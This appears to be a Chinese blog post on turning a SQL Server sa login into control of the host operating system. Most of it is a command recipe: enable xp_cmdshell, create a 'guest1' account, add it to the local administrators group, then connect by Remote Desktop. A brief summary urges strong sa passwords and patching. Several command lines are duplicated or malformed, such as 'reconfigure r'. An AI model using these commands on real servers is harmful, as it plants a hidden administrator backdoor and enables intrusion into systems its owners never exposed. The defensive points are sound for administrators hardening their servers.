如果你用sa帐号与数据库建立了连接,那么你便可以通过如下方法登录操作系统
1、开启xp_cmdshell配置权限
exec sp_configure
'
show advanced options
',
1
go
reconfigure
go
exec sp_configure ' xp_cmdshell ', 1
go
reconfigure r
go
reconfigure
go
exec sp_configure ' xp_cmdshell ', 1
go
reconfigure r
2、建立登录帐号
exec xp_cmdshell
'
net user guest1 guest1 /add
'
exec xp_cmdshell ' net localgroup administrators guest1 /add '
exec xp_cmdshell ' net user '
exec xp_cmdshell ' net localgroup administrators guest1 /add '
exec xp_cmdshell ' net user '
第一行是创建帐号,用户名密码是guest1,第二行将帐号添加到administrators组,第三行显示操作系统内帐号
3、远程桌面连接试试,看是否用上述帐号能够登上远程的操作系统
以上代码仅做测试使用,如果未成功可能与本地设置有关。
总结:
1、sa帐号密码复杂度一定高,破解了sa密码,就相当于进入了操作系统,权限越大,造成的损失就可能越大。
2、数据库连接是可以做很多事情的,所以很多扫描工具,sql server的端口1433是重点扫描的对象 。
3、及时给系统升级,打补丁。不给不法分子以可乘之机,防患于未然。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
